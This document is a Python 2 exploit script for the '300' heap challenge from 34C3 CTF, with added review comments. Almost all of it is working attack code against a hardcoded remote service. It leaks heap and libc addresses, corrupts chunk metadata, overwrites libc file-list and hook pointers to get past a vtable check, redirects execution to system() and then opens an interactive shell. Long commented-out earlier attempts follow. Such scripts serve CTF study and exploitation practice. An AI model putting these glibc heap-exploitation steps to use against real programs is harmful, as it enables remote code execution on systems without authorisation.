Exploit for 300 at 34c3ctf
import phun | |
class R(phun.Remote):
    """Thin client for the challenge's numbered menu protocol.

    Each operation is one menu number followed by a slot index (0-9).
    The low-level read/sendline/write helpers are inherited from
    phun.Remote (not visible in this file).
    """

    # Menu entry numbers as shown by the service banner.
    ALLOC = 1
    WRITE = 2
    READ = 3
    FREE = 4

    def menu(self):
        # Consume the banner up to and including its last entry.
        self.read('4) free\n')

    def cmd(self, nr, idx):
        # Wait for the menu, choose entry `nr`, then answer the index prompt.
        self.menu()
        self.sendline(str(nr))
        self.sendlineafter('(0-9)\n', str(idx))

    def read_it(self, idx):
        # Dump slot `idx` and return the line without its trailing newline.
        self.cmd(self.READ, idx)
        line = self.readline()
        return line[:-1]

    def alloc(self, idx):
        self.cmd(self.ALLOC, idx)

    def free(self, idx):
        self.cmd(self.FREE, idx)

    def write_it(self, idx, what):
        # The payload is NUL-padded to 0x300 bytes -- presumably the slot
        # size the service reads; confirm against the binary.
        self.cmd(self.WRITE, idx)
        padded = what.ljust(0x300, "\x00")
        self.write(padded)
# NOTE: Python 2 script (print statements, raw_input); it will not run
# unmodified under Python 3.
# Connection target for the CTF service; the commented alternatives are
# local test instances used during development.
#r= R('192.168.122.234',1234)
r= R('104.199.25.43',1337)
#r= R('localhost',1234)
# Fill all ten slots, then release slots 1, 3 and 5 (range(1,7,2)).
for i in range(10):
    r.alloc(i)
for i in range(1,7,2):
    r.free(i)
# Read the released slots back and decode each with phun.u64 (presumably
# the first 8 bytes as a little-endian integer). The subtracted constants
# are specific to one binary/libc build -- the commented-out alternatives
# are offsets for another build -- so they must be re-derived for any
# other target.
heap = phun.u64(r.read_it(5)) - 0x930
addr_in_libc = phun.u64(r.read_it(1))
main_arena = addr_in_libc - 88
#off1 = 0x3C4B20
off1 = 0x3C1B00
libc = main_arena - off1 #
addr = heap + 0x30
free_hook = libc + 0x3C67A8 #0x3C3788
# Python 2 print statements; shown for manual verification of the leaks.
print hex(heap),hex(libc)
print hex(main_arena),hex(free_hook)
# `off1` is reused as a scratch variable for each build-specific offset.
off1 = 0x3C67F8
#off1 = 0x3C37D0
globalmaxfast= libc + off1 - 16 ##
off1 = 0x3C4150
#off1 = 0x3C1150
check_action = libc + off1 - 16 ##
# NOTE(review): free_hook, globalmaxfast and check_action are only referenced
# from the commented-out code near the end; the live path below never uses them.
# From here on each `chunkN` is a record built by phun.p64 from several
# arguments (presumably one 8-byte word each) that is written into a slot.
# The order of the write/alloc/free calls is load-bearing: the script was
# tuned against one specific build and reordering any step changes the
# service's behaviour.
r.write_it(1,phun.p64(0xdeadbeef,addr))
r.alloc(9)
chunk0 = phun.p64(0,0x3f0,addr+0x20,addr+0x20)
chunk1 = phun.p64(0,0x310,addr+0x40,addr+0x40)
chunk2 = phun.p64(0,0x20,main_arena+88,main_arena+88)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.alloc(9)
r.write_it(1,"\x00"*0x100 + phun.p64(0x3f0))
r.alloc(8)
r.alloc(2)
r.free(7)
r.write_it(7,phun.p64(0xdeadbeef,addr))
r.alloc(3)
#raw_input('e')
# chunk0 is rebuilt several times; chunk1/chunk2 are reused from above
# unless reassigned.
chunk0 = phun.p64(0,0x319,addr+0x20,addr)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.alloc(4)
chunk0 = phun.p64(0,0x311,addr,main_arena+96)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.alloc(5)
chunk2 = phun.p64(0,0x20,main_arena+96,main_arena+96)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.alloc(1)
# Another build-specific libc offset; the trailing comments are the
# author's alternative values.
file_all = libc + 0x3c2500 -0x18#0x3C2500 -0x18# - 0x18
chunk0 = phun.p64(0,0x311,file_all,file_all)
# NOTE(review): this chunk0 is overwritten two lines below before it is
# ever written to a slot.
r.write_it(1,phun.p64(addr).ljust(0x2f0,"\x00")+\
phun.p64(main_arena+864,main_arena+872))
chunk0 = phun.p64(0,0x310,file_all,file_all)
chunk2 = phun.p64(0,0x310,file_all,main_arena+864)
r.write_it(0,chunk0+chunk1+chunk2)
r.write_it(9,"\x00"*0x10 + chunk2)
r.alloc(3)
#raw_input('x')
chunk0 = phun.p64(0,0x300,addr+0x20,addr+0x20)
chunk1 = phun.p64(0,0x310,addr+0x40,addr+0x40)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,phun.p64(addr).ljust(0x2e0,"\x00")+\
# phun.p64(file_all,file_all))
# r.alloc(3)
#bypass vtable check
# Manual pause: blocks until Enter is pressed on the operator's terminal,
# presumably to inspect the service state before continuing.
raw_input('x')
dlopen_hook = libc + 0x3c62e0 - 0x18
print hex(dlopen_hook)
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
r.write_it(1,phun.p64(addr).ljust(0x2e0,"\x00")+\
phun.p64(dlopen_hook,dlopen_hook))
r.alloc(3)
# `p` is a single libc-relative pointer padded to 0x18 bytes; the
# commented lines below are an abandoned longer layout.
p = phun.p64(libc + 0xF1651).ljust(0x18,"\x00")
#"/bin/bash"
# p += phun.p64(1,2)
# p = p.ljust(0xa0,"\x00")
# p += phun.p64(heap+0x30)
# p = p.ljust(0xc0,"\x00")
# p += phun.p64(1)
# p = p.ljust(0xd8)
# p += phun.p64(heap + 0x10)
# Build-specific offset again (alternative value in the trailing comment).
system = libc + 0x456A0 #0x45390
jump_table = "\x00"* 0x18 + phun.p64(system)
# Second manual pause before the final write and free.
raw_input('x')
r.write_it(0,jump_table + p)
r.free(7)
# Bare string literal: a developer note with no runtime effect.
'''
arena+856 - my small bin
victim:
-
'''
# Everything from here to r.shell() is commented-out earlier attempts
# (dead code), kept exactly as the author left it.
#r.write_it(7,phun.p64(0xdeadbeef,main_arena+88))
# chunk0 = phun.p64(0,0x311,main_arena+88,main_arena+88)
# chunk2 = phun.p64(0,0x3f0,main_arena+88,main_arena+88)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,"\x00"*(0x100-0xf0+0x10) + phun.p64(0x311,0x20,1,1,1,1,1))
# r.alloc(8)
# r.free(8)
# r.write_it(9,phun.p64(0xdeadbeef1,free_hook-0x20))
# r.alloc(4)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,"\x00"*(0x100-0xf0+0x10) + phun.p64(0x311,0x21,1,1,1,1,1))
# r.free(8)
# chunk0 = phun.p64(0,0x319,main_arena+88,addr+0x20)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,"\x00"*(0x100-0xf0+0x18) + phun.p64(0x319,0x21,1,1,1,1,1))
# r.write_it(9,phun.p64(0xdeadbeef2,check_action))
# r.alloc(4)
# chunk0 = phun.p64(0,0x3f1,main_arena+88,main_arena+88)
# chunk2 = phun.p64(0,0x3f1,main_arena+88,main_arena+88)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(1,"\x00"*(0x100) + phun.p64(0x3f1,0x21,1,1,1,1,1))
# r.free(8)
# chunk0 = phun.p64(0,0x3f1,main_arena+88,addr+0x20)
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2)
# r.write_it(9,phun.p64(addr,free_hook-0x20+8))
# r.alloc(4)
# chunk0 = phun.p64(0,0x3f1,main_arena+88,main_arena+88)
# chunk1 = phun.p64(0,0x91,main_arena+88,main_arena+88)
# x= "\x00"*0x20+chunk0+chunk1+chunk2
# x+="\x00"*0x50 + phun.p64(0,0x21,0,0,1,1,1,1,1)
# r.write_it(0,x)
# raw_input('x')
# r.free(9)
# # r.write_it(5,phun.p64(0xdeadbeef,check_action))
# # for i in range(3):
# # r.alloc(1)
# # r.free(1);r.free(3);r.free(7)
# # for i in range(9):
# # r.alloc(i)
# # for i in range(1,7,2):
# # r.free(i)
# # r.write_it(5,phun.p64(0xdeadbeef,globalmaxfast))
# # r.alloc(1);r.alloc(2);r.alloc(3)
# # # r.free(1)
# # # r.free(2)
# # # r.free(3)
# # r.free(5)
# # #r.write_it(5,phun.p64(free_hook,free_hook))
# # r.alloc(0)
# # for i in range(10):
# # r.alloc(i)
# # raw_input('x')
# # #r.alloc(3)
# # # # #r.write_it(
# Hand the connection over to an interactive session (phun.Remote.shell,
# not visible here).
r.shell()